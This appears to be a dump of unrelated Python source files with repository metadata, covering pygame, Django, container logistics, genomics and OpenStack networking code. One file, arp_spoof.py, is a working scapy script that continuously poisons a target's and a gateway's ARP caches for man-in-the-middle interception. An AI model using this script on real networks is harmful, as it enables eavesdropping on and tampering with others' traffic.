from vector2 import * import pygame class Image: def __init__(self, src, draw_width=64, draw_height=64): self.src = src self.image = pygame.image.load(self.src).convert_alpha() self.rescale(Vector2(draw_width, draw_height)) self.image_rect = self.image.get_rect() self.dimensions = Vector2(self.image.get_width(), self.image.get_height()) def rescale(self, new_dimensions): if self.image.get_width() != self.image.get_height(): x = new_dimensions.x y = x new_dimensions = Vector2(int(new_dimensions.x), int(round(new_dimensions.x / self.image.get_width() * self.image.get_height()))) self.image = pygame.transform.scale(self.image, new_dimensions.tuple()).convert_alpha() self.dimensions = Vector2(self.image.get_width(), self.image.get_height()) def draw(self, screen, position, flip=False): if flip: screen.blit(pygame.transform.flip(self.image, True, False), position.tuple()) else: screen.blit(self.image, position.tuple())
39.72
132
0.717019
aa76e54299ab50a763c526250be7d0ebe60dd720
85
py
Python
backend/blame/apps.py
StichtingIAPC/swipe
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
[ "BSD-3-Clause-Clear" ]
null
null
null
backend/blame/apps.py
StichtingIAPC/swipe
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
[ "BSD-3-Clause-Clear" ]
null
null
null
backend/blame/apps.py
StichtingIAPC/swipe
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
[ "BSD-3-Clause-Clear" ]
null
null
null
from django.apps import AppConfig class BlameConfig(AppConfig): name = 'blame'
14.166667
33
0.741176
45497b59322fb32318be73dd966a328124e1904b
6,027
py
Python
conflowgen/posthoc_analyses/yard_capacity_analysis.py
1grasse/conflowgen
142330ab6427254109af3b86102a30a13144ba0c
[ "MIT" ]
null
null
null
conflowgen/posthoc_analyses/yard_capacity_analysis.py
1grasse/conflowgen
142330ab6427254109af3b86102a30a13144ba0c
[ "MIT" ]
null
null
null
conflowgen/posthoc_analyses/yard_capacity_analysis.py
1grasse/conflowgen
142330ab6427254109af3b86102a30a13144ba0c
[ "MIT" ]
null
null
null
from __future__ import annotations import datetime from typing import Dict, Tuple, List, Collection, Union from conflowgen.domain_models.data_types.storage_requirement import StorageRequirement from conflowgen.domain_models.arrival_information import TruckArrivalInformationForDelivery, \ TruckArrivalInformationForPickup from conflowgen.domain_models.container import Container from conflowgen.domain_models.data_types.container_length import ContainerLength from conflowgen.domain_models.vehicle import LargeScheduledVehicle, Truck from conflowgen.posthoc_analyses.abstract_posthoc_analysis import AbstractPostHocAnalysis, get_hour_based_time_window, \ get_hour_based_range class YardCapacityAnalysis(AbstractPostHocAnalysis): """ This analysis can be run after the synthetic data has been generated. The analysis returns a data structure that can be used for generating reports (e.g., in text or as a figure) as it is the case with :class:`.YardCapacityAnalysisReport`. """ @staticmethod def get_used_yard_capacity_over_time( storage_requirement: Union[str, Collection, StorageRequirement] = "all" ) -> Dict[datetime.datetime, float]: """ For each hour, the containers entering and leaving the yard are checked. Based on this, the required yard capacity in TEU can be deduced - it is simply the maximum of these values. In addition, with the parameter ``storage_requirement`` the yard capacity can be filtered, e.g. to only include standard containers, empty containers, or any other kind of subset. Please be aware that this method slightly overestimates the required capacity. If one container leaves the yard at the beginning of the respective time window and another container enters the yard at the end of the same time window, still the TEU equivalence of both containers is recorded as the required yard capacity. Obviously the entering container could use the same slot as the container which entered later. This minor inaccuracy might be of little importance because no yard should be planned that tight. The benefit is that it further allows a faster computation. Args: storage_requirement: One of ``"all"``, a collection of :class:`StorageRequirement` enum values (as a list, set, or similar), or a single :class:`StorageRequirement` enum value. Returns: A series of the used yard capacity in TEU over the time. """ container_stays: List[Tuple[datetime.datetime, datetime.datetime, float]] = [] container: Container if storage_requirement == "all": selected_containers = Container.select() else: if storage_requirement in set(StorageRequirement): selected_containers = Container.select().where( Container.storage_requirement == storage_requirement ) else: # assume it is some kind of collection (list, set, ...) selected_containers = Container.select().where( Container.storage_requirement << storage_requirement ) for container in selected_containers: container_enters_yard: datetime.datetime container_leaves_yard: datetime.datetime if container.delivered_by_truck is not None: truck: Truck = container.delivered_by_truck arrival_time_information: TruckArrivalInformationForDelivery = \ truck.truck_arrival_information_for_delivery container_enters_yard = arrival_time_information.realized_container_delivery_time elif container.delivered_by_large_scheduled_vehicle is not None: vehicle: LargeScheduledVehicle = container.delivered_by_large_scheduled_vehicle container_enters_yard = vehicle.scheduled_arrival else: raise Exception(f"Faulty data: {container}") if container.picked_up_by_truck is not None: truck: Truck = container.picked_up_by_truck arrival_time_information: TruckArrivalInformationForPickup = \ truck.truck_arrival_information_for_pickup container_leaves_yard = arrival_time_information.realized_container_pickup_time elif container.picked_up_by_large_scheduled_vehicle is not None: vehicle: LargeScheduledVehicle = container.picked_up_by_large_scheduled_vehicle container_leaves_yard = vehicle.scheduled_arrival else: raise Exception(f"Faulty data: {container}") teu_factor_of_container = ContainerLength.get_factor(container.length) container_stays.append((container_enters_yard, container_leaves_yard, teu_factor_of_container)) if len(container_stays) == 0: return {} first_arrival, _, _ = min(container_stays, key=lambda x: x[0]) _, last_pickup, _ = max(container_stays, key=lambda x: x[1]) first_time_window = get_hour_based_time_window(first_arrival) - datetime.timedelta(hours=1) last_time_window = get_hour_based_time_window(last_pickup) + datetime.timedelta(hours=1) used_yard_capacity: Dict[datetime.datetime, float] = { time_window: 0 for time_window in get_hour_based_range(first_time_window, last_time_window) } for (container_enters_yard, container_leaves_yard, teu_factor_of_container) in container_stays: time_window_at_entering = get_hour_based_time_window(container_enters_yard) time_window_at_leaving = get_hour_based_time_window(container_leaves_yard) for time_window in get_hour_based_range(time_window_at_entering, time_window_at_leaving): used_yard_capacity[time_window] += teu_factor_of_container return used_yard_capacity
53.336283
120
0.710138
d03d301c1394ac7fb12418590cb4281401350016
3,280
py
Python
short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py
lynnlangit/idseq-workflows
2423bcb88e3e084b0d709c9936aecd476364a31e
[ "MIT" ]
null
null
null
short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py
lynnlangit/idseq-workflows
2423bcb88e3e084b0d709c9936aecd476364a31e
[ "MIT" ]
null
null
null
short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py
lynnlangit/idseq-workflows
2423bcb88e3e084b0d709c9936aecd476364a31e
[ "MIT" ]
null
null
null
import os import subprocess from idseq_dag.engine.pipeline_step import PipelineCountingStep from idseq_dag.exceptions import InsufficientReadsError import idseq_dag.util.command as command import idseq_dag.util.command_patterns as command_patterns import idseq_dag.util.convert as convert import idseq_dag.util.log as log import idseq_dag.util.count as count from idseq_dag.util.s3 import fetch_reference class PipelineStepRunGsnapFilter(PipelineCountingStep): """ Regardless of specified “host” organism, it is essential to remove all potentially-human sequences for privacy reasons. Thus, a final GSNAP alignment is performed against the human genome for samples from all host types. ``` gsnapl -A sam --batch=0 --use-shared-memory=0 --gmap-mode=all --npaths=1 --ordered -t 32 --max-mismatches=40 -D {gsnap_base_dir} -d {gsnap_index_name} -o {output_sam_file} {input_fas} ``` Two input FASTAs means paired reads. The GSNAP documentation can be found [here](http://research-pub.gene.com/gmap/src/README). """ # Two input FASTAs means paired reads. def input_fas(self): return self.input_files_local[0][0:2] def validate_input_files(self): if not count.files_have_min_reads(self.input_fas(), 1): raise InsufficientReadsError("Insufficient reads") def run(self): input_fas = self.input_fas() output_fas = self.output_files_local() output_sam_file = os.path.join(self.output_dir_local, self.additional_attributes["output_sam_file"]) self.additional_output_files_hidden.append(output_sam_file) genome_dir = fetch_reference(self.additional_files["gsnap_genome"], self.ref_dir_local, allow_s3mi=True, auto_untar=True) gsnap_base_dir = os.path.dirname(genome_dir) gsnap_index_name = os.path.basename(genome_dir) # Hack to determine gsnap vs gsnapl error_message = subprocess.run( ['gsnapl', '-D', gsnap_base_dir, '-d', gsnap_index_name], input='>'.encode('utf-8'), stderr=subprocess.PIPE, stdout=subprocess.PIPE ).stderr gsnap_exe = "gsnap" if 'please run gsnap instead' in error_message.decode('utf-8') else "gsnapl" # Run Gsnap gsnap_params = [ '-A', 'sam', '--batch=0', '--use-shared-memory=0', '--gmap-mode=all', '--npaths=1', '--ordered', '-t', 32, '--max-mismatches=40', '-D', gsnap_base_dir, '-d', gsnap_index_name, '-o', output_sam_file ] + input_fas command.execute( command_patterns.SingleCommand( cmd=gsnap_exe, args=gsnap_params ) ) log.write("Finished GSNAP alignment.") # Extract out unmapped files from sam if len(input_fas) == 2: convert.generate_unmapped_pairs_from_sam( output_sam_file, output_fas) else: convert.generate_unmapped_singles_from_sam( output_sam_file, output_fas[0])
36.444444
104
0.623171
9d6871caad73ee47db1d0a583622ba4a1ee5a9de
2,632
py
Python
lingofunk_regenerate/tests.py
lingofunk/lingofunk-regenerate
aa38044594990c895e0f370734447dcc388c0b2f
[ "MIT" ]
null
null
null
lingofunk_regenerate/tests.py
lingofunk/lingofunk-regenerate
aa38044594990c895e0f370734447dcc388c0b2f
[ "MIT" ]
null
null
null
lingofunk_regenerate/tests.py
lingofunk/lingofunk-regenerate
aa38044594990c895e0f370734447dcc388c0b2f
[ "MIT" ]
null
null
null
import torch import numpy as np from lingofunk_regenerate.utils import log as _log def log(text): _log(text, prefix="tests: ") def test_generate_text_of_sentiment(model, dataset): log("Text generation of given sentiment\n") # Samples latent and conditional codes randomly from prior z = model.sample_z_prior(1) c = model.sample_c_prior(1) # Generate positive sample given z c[0, 0], c[0, 1] = 1, 0 _, c_idx = torch.max(c, dim=1) sample_idxs = model.sample_sentence(z, c, temp=0.1) log("Sentiment: {}".format(dataset.idx2label(int(c_idx)))) log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs))) # Generate negative sample from the same z c[0, 0], c[0, 1] = 0, 1 _, c_idx = torch.max(c, dim=1) sample_idxs = model.sample_sentence(z, c, temp=0.8) log("Sentiment: {}".format(dataset.idx2label(int(c_idx)))) log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs))) def test_interpolate(model, dataset, gpu=False): log("Interpolation of z\n") c = model.sample_c_prior(1) z1 = model.sample_z_prior(1).view(1, 1, model.z_dim) z1 = z1.cuda() if gpu else z1 z2 = model.sample_z_prior(1).view(1, 1, model.z_dim) z2 = z2.cuda() if gpu else z2 # Interpolation coefficients alphas = np.linspace(0, 1, 10) for alpha in alphas: z = float(1 - alpha) * z1 + float(alpha) * z2 sample_idxs = model.sample_sentence(z, c, temp=0.1) sample_sent = dataset.idxs2sentence(sample_idxs) log("{}".format(sample_sent)) def test_encode_text_add_noize_and_decode( model, dataset, sentence="I love to eat in Las Vegas", use_c_prior=True ): log("Encode, add noize & decode\n") log("Sentence: " + sentence) mbsize = 1 sentence = dataset.sentence2idxs(sentence) sentence = np.array(sentence).reshape(-1, mbsize) sentence = torch.from_numpy(sentence) # Encoder: sentence -> z mu, logvar = model.forward_encoder(sentence) if use_c_prior: c = model.sample_c_prior(mbsize) else: c = model.forward_discriminator(sentence.transpose(0, 1)) # c[0, 0], c[0, 1] = 1, 0 sigma = 0.001 temp = 0.001 for i in range(10): z = model.sample_z(mu, logvar) z_noized = z.type(torch.FloatTensor) + torch.from_numpy( np.random.randn(z.size(0), z.size(1)) ).type(torch.FloatTensor) * (0 if i == 0 else sigma) sampled = model.sample_sentence(z_noized, c, temp=temp) sampled_sentence = dataset.idxs2sentence(sampled) print("Sampled sentence: " + sampled_sentence + "\n")
28.301075
75
0.648556
2156100a4127a2f54f129e082dfcea6c3ca17ef5
1,102
py
Python
tools/arp_spoof.py
s3q/backdoor_c
5c5f67bcc37fea34d84e2ed0805df52ceb060c7a
[ "Apache-2.0" ]
5
2021-08-05T05:22:45.000Z
2022-02-23T00:11:53.000Z
tools/arp_spoof.py
s3q/blackdoor
5c5f67bcc37fea34d84e2ed0805df52ceb060c7a
[ "Apache-2.0" ]
null
null
null
tools/arp_spoof.py
s3q/blackdoor
5c5f67bcc37fea34d84e2ed0805df52ceb060c7a
[ "Apache-2.0" ]
null
null
null
import sys import scapy.all as scapy import argparse from time import sleep def get_arguments(): parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', dest='target', help='Specify target ip') parser.add_argument('-g', '--gateway', dest='gateway', help='Specify spoof ip') return parser.parse_args() def get_mac(ip): responses, unanswered = scapy.srp(scapy.Ether(dst="FF:FF:FF:FF:FF:FF")/scapy.ARP(pdst=ip), timeout=1, retry=2, verbose=False) for s,r in responses: return r[scapy.Ether].src return None def spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.send(packet, verbose=False) arguments = get_arguments() sent_packet=0 try: while True: spoof(arguments.target, arguments.gateway) spoof(arguments.gateway, arguments.target) sent_packet+=2 print('\r[+] - Sent packet : '+str(sent_packet)) sys.stdout.flush() sleep(1) except KeyboardInterrupt: print('[-] - Ctrl + C detected ...')
30.611111
129
0.675136
19e69e622c4cbcfb2e1c43de650593873b3e849b
1,592
py
Python
recipes/engine_tests/multiple_placeholders.py
engeg/recipes-py
9dac536b55887262b4ce846f3db7a7f596542e5e
[ "Apache-2.0" ]
1
2021-04-24T04:03:01.000Z
2021-04-24T04:03:01.000Z
recipes/engine_tests/multiple_placeholders.py
engeg/recipes-py
9dac536b55887262b4ce846f3db7a7f596542e5e
[ "Apache-2.0" ]
null
null
null
recipes/engine_tests/multiple_placeholders.py
engeg/recipes-py
9dac536b55887262b4ce846f3db7a7f596542e5e
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Tests error checking around multiple placeholders in a single step.""" from recipe_engine.post_process import DropExpectation DEPS = [ 'assertions', 'json', 'step', ] def RunSteps(api): # illegal; multiple unnamed placeholders of the same kind "json.output". with api.assertions.assertRaisesRegexp( ValueError, r'conflicting .*: \[\'json\.output unnamed\'\]'): api.step('step 1', ['cmd', api.json.output(), api.json.output()]) # illegal; multiple named placeholders with the same name with api.assertions.assertRaisesRegexp( ValueError, r'conflicting .*: \["json\.output named \'bob\'"\]'): api.step('step 2', [ 'cmd', api.json.output(name='bob'), api.json.output(name='bob'), ]) # legal; multiple named placeholders with unique names result = api.step('step 3', [ 'cmd', api.json.output(name='bob'), api.json.output(name='charlie'), ]) api.assertions.assertEqual(result.json.outputs['bob'], 1) api.assertions.assertEqual(result.json.outputs['charlie'], 2) # legal; multiple of the same input placeholders result = api.step('step 4', [ 'cmd', api.json.input('bob'), api.json.input('charlie'), ]) def GenTests(api): yield ( api.test('basic') + api.step_data( 'step 3', api.json.output(1, name='bob'), api.json.output(2, name='charlie'), ) + api.post_process(DropExpectation) )
26.983051
74
0.652638
2b6de2fc2ecb27febe44479b8954066a0ab7f415
6,973
py
Python
parsers.py
Dataliberate/bibschemaorg
5548293ddf79e94153b70ae3eefa9ee2adcd2e13
[ "Apache-2.0" ]
2
2015-11-19T03:53:09.000Z
2016-11-23T10:45:33.000Z
parsers.py
Dataliberate/bibschemaorg
5548293ddf79e94153b70ae3eefa9ee2adcd2e13
[ "Apache-2.0" ]
1
2015-04-28T15:54:20.000Z
2015-04-29T23:13:13.000Z
parsers.py
Dataliberate/bibschemaorg
5548293ddf79e94153b70ae3eefa9ee2adcd2e13
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # import webapp2 import re from google.appengine.ext import db from google.appengine.ext import blobstore from google.appengine.ext.webapp import blobstore_handlers import xml.etree.ElementTree as ET import logging import api def MakeParserOfType (format, webapp): if (format == 'mcf') : return MCFParser(webapp) elif (format == 'rdfa') : return RDFAParser(webapp) else : return 0 class ParseExampleFile : def __init__ (self, webapp): self.webapp = webapp self.initFields() def initFields(self): self.currentStr = [] self.terms = [] self.egmeta = {} self.preMarkupStr = "" self.microdataStr = "" self.rdfaStr = "" self.jsonStr = "" self.state= "" def nextPart(self, next): if (self.state == 'PRE-MARKUP:'): self.preMarkupStr = "".join(self.currentStr) elif (self.state == 'MICRODATA:'): self.microdataStr = "".join(self.currentStr) elif (self.state == 'RDFA:'): self.rdfaStr = "".join(self.currentStr) elif (self.state == 'JSON:'): self.jsonStr = "".join(self.currentStr) self.state = next self.currentStr = [] def process_example_id(self, m): self.egmeta["id"] = m.group(1) logging.debug("Storing ID: %s" % self.egmeta["id"] ) return '' def parse (self, contents): content = "" egid = re.compile("""#(\S+)\s+""") for i in range(len(contents)): content += contents[i] lines = re.split('\n|\r', content) for line in lines: # Per-example sections begin with e.g.: 'TYPES: #music-2 Person, MusicComposition, Organization' if ((len(line) > 6) and line[:6] == "TYPES:"): self.nextPart('TYPES:') api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta) # logging.info("AddExample called with terms %s " % self.terms) self.initFields() typelist = re.split(':', line) self.terms = [] self.egmeta = {} # logging.info("TYPE INFO: '%s' " % line ); tdata = egid.sub(self.process_example_id, typelist[1]) # strips IDs, records them in egmeta["id"] ttl = tdata.split(',') for ttli in ttl: ttli = re.sub(' ', '', ttli) # logging.info("TTLI: %s " % ttli); # danbri tmp self.terms.append(api.Unit.GetUnit(ttli, True)) else: tokens = ["PRE-MARKUP:", "MICRODATA:", "RDFA:", "JSON:"] for tk in tokens: ltk = len(tk) if (len(line) > ltk-1 and line[:ltk] == tk): self.nextPart(tk) line = line[ltk:] if (len(line) > 0): self.currentStr.append(line + "\n") api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta) # should flush on each block of examples # logging.info("Final AddExample called with terms %s " % self.terms) class RDFAParser : def __init__ (self, webapp): self.webapp = webapp def parse (self, files, layer="core"): self.items = {} root = [] for i in range(len(files)): logging.info("RDFa parse schemas in %s " % files[i]) parser = ET.XMLParser(encoding="utf-8") tree = ET.parse(files[i], parser=parser) root.append(tree.getroot()) pre = root[i].findall(".//*[@prefix]") for e in range(len(pre)): api.Unit.storePrefix(pre[e].get('prefix')) for i in range(len(root)): self.extractTriples(root[i], None, layer) return self.items.keys() def stripID (self, str) : if (len(str) > 16 and (str[:17] == 'http://schema.org')) : return str[18:] else: return str def extractTriples(self, elem, currentNode, layer="core"): typeof = elem.get('typeof') resource = elem.get('resource') href = elem.get('href') property = elem.get('property') text = elem.text if (property != None): property = api.Unit.GetUnit(self.stripID(property), True) if (href != None) : href = api.Unit.GetUnit(self.stripID(href), True) # self.webapp.write("<br>%s %s %s" % (currentNode, property, href)) api.Triple.AddTriple(currentNode, property, href, layer) self.items[currentNode] = 1 elif (text != None): # logging.info("<br>%s %s '%s'" % (currentNode, property, text)) api.Triple.AddTripleText(currentNode, property, text, layer) self.items[currentNode] = 1 if (resource != None): currentNode = api.Unit.GetUnit(self.stripID(resource), True) if (typeof != None): api.Triple.AddTriple(currentNode, api.Unit.GetUnit("typeOf", True), api.Unit.GetUnit(self.stripID(typeof), True), layer) for child in elem.findall('*'): self.extractTriples(child, currentNode, layer) class MCFParser: def __init__ (self, webapp): self.webapp = webapp def extractUnitName (self, line): parts = re.split(':', line) name = parts[1] return re.sub(' ', '', name) def extractPredicateName (self, line): parts = re.split(':', line) return parts[0] def cleanValue (self, value) : if (value.find('"') > -1): parts = re.split('"', value) return parts[1] else: return re.sub(' ', '', value) def extractValues (self, line): parts = re.split(':', line) raw_values = re.split(',', parts[1]) values = [] for rv in raw_values: values.append(self.cleanValue(rv)) return values def parse (self, content): self.items = {} lines = re.split('\n|\r', content) unit = None for l in lines: # self.webapp.write("Got line" + l) if (len(l) > 5 and (l[:5] == "Unit:")) : unit = api.Unit.GetUnit(self.extractUnitName(l), True) self.items[unit] = 1 # self.webapp.write("Got unit:" + unit) elif (len(l) > 1 and (l.find(':') > 1)) : predicate = apiUnit.GetUnit(self.extractPredicateName(l), True) values = self.extractValues(l) # self.webapp.write("<br>Got predicate " + predicate) for v in values: api.Triple.AddTriple(unit, predicate, api.Unit.GetUnit(v, True)) return self.items.keys()
35.395939
162
0.530331
bc636021ea1da44862595c57e3c1d2942b4b0f54
816
py
Python
scrapyproject/cinemaspiders/yahoo_cinema.py
gas1121/JapanCinemaStatusSpider
67c7b963914565589f64dd1bcf18839a4160ea34
[ "MIT" ]
2
2018-06-07T13:28:03.000Z
2018-12-10T14:04:53.000Z
scrapyproject/cinemaspiders/yahoo_cinema.py
gas1121/JapanCinemaStatusSpider
67c7b963914565589f64dd1bcf18839a4160ea34
[ "MIT" ]
null
null
null
scrapyproject/cinemaspiders/yahoo_cinema.py
gas1121/JapanCinemaStatusSpider
67c7b963914565589f64dd1bcf18839a4160ea34
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from scrapyproject.cinemaspiders.cinema_spider import CinemaSpider class YahooCinemaSpider(CinemaSpider): """ cinema info spider for http://movies.yahoo.co.jp """ name = "yahoo_cinema" allowed_domains = ["movies.yahoo.co.jp"] start_urls = ['http://movies.yahoo.co.jp/area/'] # settings for cinema_spider county_xpath = '//div[@id="allarea"]//a' cinema_xpath = '//div[@id="theater"]//a' cinema_site_xpath = '//th[text()="公式サイト"]/..//a/text()' screen_text_xpath = '//th[text()="座席"]/..//li/text()' screen_pattern = r"^\[?(.*?)(\] )?客席数 (.+)$" screen_name_pattern = r"\1" seat_number_pattern = r"\3" def adjust_cinema_url(self, url): """ adjust cinema page's url if needed """ return url + "/info/"
30.222222
66
0.598039
311410c80a974846f30f371dd812b452cfdfd099
834
py
Python
tests/test_network.py
horpto/phone-iso3166
09d6bb8cf69bc0dffb97677924aa3318b579f030
[ "MIT" ]
19
2017-03-28T10:35:22.000Z
2022-03-14T04:39:03.000Z
tests/test_network.py
horpto/phone-iso3166
09d6bb8cf69bc0dffb97677924aa3318b579f030
[ "MIT" ]
17
2016-11-11T11:50:57.000Z
2021-06-22T09:32:17.000Z
tests/test_network.py
horpto/phone-iso3166
09d6bb8cf69bc0dffb97677924aa3318b579f030
[ "MIT" ]
5
2015-09-28T18:25:38.000Z
2021-07-05T11:57:58.000Z
from phone_iso3166.network import network, country_networks from phone_iso3166.errors import InvalidNetwork, InvalidCountry import pytest def test_network(): c, n = network(238, 1) assert c == 'DK' assert n == 'TDC A/S' c, n = network(238, 2) assert c == 'DK' assert n == 'Telenor Denmark' c, n = network(425, 6) assert c == 'PS' assert n == 'Wataniya Palestine Mobile Telecommunications Company' def test_country_networks(): nets = country_networks('US') for n in nets: mcc, mnc, name0 = n c, name1 = network(mcc, mnc) assert c == 'US' assert name0 == name1 def test_invalid_country(): with pytest.raises(InvalidCountry): country_networks('XX') def test_invalid_network(): with pytest.raises(InvalidNetwork): network(0, 0)
22.540541
70
0.642686
40e4632d5779dce44c1d9dd5543d9499b88f9de2
512
py
Python
pysal/explore/segregation/tests/test_atkinson.py
ocefpaf/pysal
7e397bdb4c22d4e2442b4ee88bcd691d2421651d
[ "BSD-3-Clause" ]
1
2021-08-16T02:47:35.000Z
2021-08-16T02:47:35.000Z
pysal/explore/segregation/tests/test_atkinson.py
ocefpaf/pysal
7e397bdb4c22d4e2442b4ee88bcd691d2421651d
[ "BSD-3-Clause" ]
null
null
null
pysal/explore/segregation/tests/test_atkinson.py
ocefpaf/pysal
7e397bdb4c22d4e2442b4ee88bcd691d2421651d
[ "BSD-3-Clause" ]
null
null
null
import unittest import pysal.lib import geopandas as gpd import numpy as np from pysal.explore.segregation.aspatial import Atkinson class Atkinson_Tester(unittest.TestCase): def test_Atkinson(self): s_map = gpd.read_file(pysal.lib.examples.get_path("sacramentot2.shp")) df = s_map[['geometry', 'HISP_', 'TOT_POP']] index = Atkinson(df, 'HISP_', 'TOT_POP') np.testing.assert_almost_equal(index.statistic, 0.15079259382667654) if __name__ == '__main__': unittest.main()
28.444444
78
0.71875
7088e9a6165ff2359d6eeb299deb8df60e7868ec
2,234
py
Python
tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py
marshall/gaia
00722269f5d559595fd2f79d9dd70310758af08c
[ "Apache-2.0" ]
1
2019-02-13T23:44:14.000Z
2019-02-13T23:44:14.000Z
tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py
marshall/gaia
00722269f5d559595fd2f79d9dd70310758af08c
[ "Apache-2.0" ]
null
null
null
tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py
marshall/gaia
00722269f5d559595fd2f79d9dd70310758af08c
[ "Apache-2.0" ]
null
null
null
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. try: from marionette import Wait except: from marionette_driver import Wait from gaiatest import GaiaTestCase from gaiatest.apps.gallery.app import Gallery from gaiatest.apps.camera.app import ImagePreview class TestGallery(GaiaTestCase): def setUp(self): GaiaTestCase.setUp(self) self.apps.set_permission('Camera', 'geolocation', 'deny') self.push_resource('IMG_0001.jpg') def test_gallery_switch_to_camera(self): """ https://moztrap.mozilla.org/manage/case/3620/ """ gallery = Gallery(self.marionette) gallery.launch() gallery.wait_for_files_to_load(1) # Enter the single photo view image = gallery.tap_first_gallery_item() self.assertIsNotNone(image.current_image_source) # Check that there are 5 options displayed beneath the picture self.assertEqual(len(image.photo_toolbar_options), 5) # Tap on the Camera button to go to the Camera app self.previous_number_of_pictures = len(self.data_layer.picture_files) self.camera = image.tap_switch_to_camera() # Take a picture and verify the picture is taken self.camera.take_photo() # Check that picture saved to SD card Wait(self.marionette).until(lambda m: len(self.data_layer.picture_files) == self.previous_number_of_pictures + 1) # Open Preview, tap the option icon and select Gallery app self.camera.tap_thumbnail() self.preview = ImagePreview(self.marionette) self.preview.tap_switch_to_gallery() # Verify the Gallery app is now open, with one more file gallery.wait_for_files_to_load(2) new_image = gallery.tap_first_gallery_item() # verify the new first image is not same as the previous (and only) first image, # meaning that the new image is shown on the top of the gallery app grid self.assertFalse(new_image.current_image_source is image.current_image_source)
36.622951
88
0.690689
44964e4684f169404a501c81942100c1ece96411
14,468
py
Python
neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py
1pintbeer/neutron
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
[ "Apache-2.0" ]
null
null
null
neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py
1pintbeer/neutron
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
[ "Apache-2.0" ]
null
null
null
neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py
1pintbeer/neutron
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
[ "Apache-2.0" ]
null
null
null
# Copyright (C) 2014,2015 VA Linux Systems Japan K.K. # Copyright (C) 2014,2015 YAMAMOTO Takashi <yamamoto at valinux co jp> # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ * references ** OVS agent https://wiki.openstack.org/wiki/Ovs-flow-logic """ import netaddr from neutron_lib import constants as p_const from os_ken.lib.packet import ether_types from os_ken.lib.packet import icmpv6 from os_ken.lib.packet import in_proto from oslo_log import log as logging from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants from neutron.plugins.ml2.drivers.openvswitch.agent.openflow.native \ import ovs_bridge LOG = logging.getLogger(__name__) class OVSIntegrationBridge(ovs_bridge.OVSAgentBridge): """openvswitch agent br-int specific logic.""" of_tables = constants.INT_BR_ALL_TABLES def setup_default_table(self): self.setup_canary_table() self.install_goto(dest_table_id=constants.TRANSIENT_TABLE) self.install_normal(table_id=constants.TRANSIENT_TABLE, priority=3) self.install_drop(table_id=constants.ARP_SPOOF_TABLE) self.install_drop(table_id=constants.LOCAL_SWITCHING, priority=constants.OPENFLOW_MAX_PRIORITY, vlan_vid=constants.DEAD_VLAN_TAG) def setup_canary_table(self): self.install_drop(constants.CANARY_TABLE) def check_canary_table(self): try: flows = self.dump_flows(constants.CANARY_TABLE) except RuntimeError: LOG.exception("Failed to communicate with the switch") return constants.OVS_DEAD return constants.OVS_NORMAL if flows else constants.OVS_RESTARTED @staticmethod def _local_vlan_match(_ofp, ofpp, port, vlan_vid): return ofpp.OFPMatch(in_port=port, vlan_vid=vlan_vid) def provision_local_vlan(self, port, lvid, segmentation_id): (_dp, ofp, ofpp) = self._get_dp() if segmentation_id is None: vlan_vid = ofp.OFPVID_NONE actions = [ofpp.OFPActionPushVlan()] else: vlan_vid = segmentation_id | ofp.OFPVID_PRESENT actions = [] match = self._local_vlan_match(ofp, ofpp, port, vlan_vid) actions += [ ofpp.OFPActionSetField(vlan_vid=lvid | ofp.OFPVID_PRESENT), ] instructions = [ ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions), ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE), ] self.install_instructions( instructions=instructions, priority=3, match=match, ) def reclaim_local_vlan(self, port, segmentation_id): (_dp, ofp, ofpp) = self._get_dp() if segmentation_id is None: vlan_vid = ofp.OFPVID_NONE else: vlan_vid = segmentation_id | ofp.OFPVID_PRESENT match = self._local_vlan_match(ofp, ofpp, port, vlan_vid) self.uninstall_flows(match=match) @staticmethod def _arp_dvr_dst_mac_match(ofp, ofpp, vlan, dvr_mac): # If eth_dst is equal to the dvr mac of this host, then # flag it as matched. return ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT, eth_dst=dvr_mac) @staticmethod def _dvr_dst_mac_table_id(network_type): if network_type == p_const.TYPE_VLAN: return constants.ARP_DVR_MAC_TO_DST_MAC_VLAN else: return constants.ARP_DVR_MAC_TO_DST_MAC def install_dvr_dst_mac_for_arp(self, network_type, vlan_tag, gateway_mac, 